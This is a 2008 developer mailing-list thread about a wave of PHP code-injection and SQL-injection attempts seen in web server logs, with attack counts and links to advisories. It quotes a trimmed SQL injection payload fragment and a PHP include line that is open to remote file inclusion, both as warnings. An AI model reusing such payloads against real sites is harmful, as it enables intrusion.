The code was encoded, and after decoding it, all it does is echo a statement back. Some searching online, I found a write up on it - <http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.htm l> http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html - if your interested. As to the why use the HTTP_USER_AGENT field.. Got me. I don't know of any exploits using it... A quick search online, I did find a older version of AWStats that had a bug using the http_referr. Could be related. See <http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=290> http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=290 Btw, you would be surprised at how many hosting places there are where you can use commands like - 'exec', 'shell_exec', 'system', passthru'. An URL Injection example: <http://osvdb.org/show/osvdb/37816> http://osvdb.org/show/osvdb/37816 The code this injection exploits is : require_once($languagePath . 'common.lang.php'); If your really curious and want more info, try some searchs for "PHP remote file inclusion" or "url injection". Terre
_____ From: Matthew Ratzloff [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 16, 2008 7:21 PM To: Terre Porter Cc: fw-general@lists.zend.com Subject: Re: [fw-general] programmers fyi OK, I can see how this would be a problem if you logged user agents in the database, someone sent an SQL injection attempt, and you didn't use prepared statements or escape those values. But... uh... how is PHP "injection" supposed to do anything? Is someone eval-ing the user agent or what? Maybe I'm missing something. -Matt On Tue, Sep 16, 2008 at 2:39 PM, Terre Porter <[EMAIL PROTECTED]> wrote: Hey all, Just thought I'd pass on this observation though not related directly to the framework but this happens to be the only list I'm on anymore. Anyways, I've been monitoring a large influx of code injection attempts by inserting php code in the server variables, HTTP_USER_AGENT mostly. These sometimes are included with a URL Injection attempt but not always. Also for those out there who have some CF or ASP (I think) there are a lot of the following being appended to page requests. Trimmed but should make the point... [EMAIL PROTECTED](4000);[EMAIL PROTECTED](0x4445...%20AS%20CHAR(4000));EXEC(@S ); Just as a reminder to everyone to write more secure code. Here are some numbers from a smaller site I'm logging, avg 2500 visitors a day. Date..............# 01/Sep/2008 86 02/Sep/2008 119 03/Sep/2008 56 04/Sep/2008 31 05/Sep/2008 93 06/Sep/2008 84 07/Sep/2008 129 08/Sep/2008 141 09/Sep/2008 47 10/Sep/2008 136 11/Sep/2008 96 12/Sep/2008 140 13/Sep/2008 200 14/Sep/2008 250 15/Sep/2008 130 16/Sep/2008 36 URL Injection attempts from 1773 unique ip addresses. (that's a few infected machines) These numbers don't count all the HTTP_USER_AGENT code injection attempts as those are getting blocked but .htaccess currently. Just wanted to let people know the script-kiddy scanners are out playing. Terre
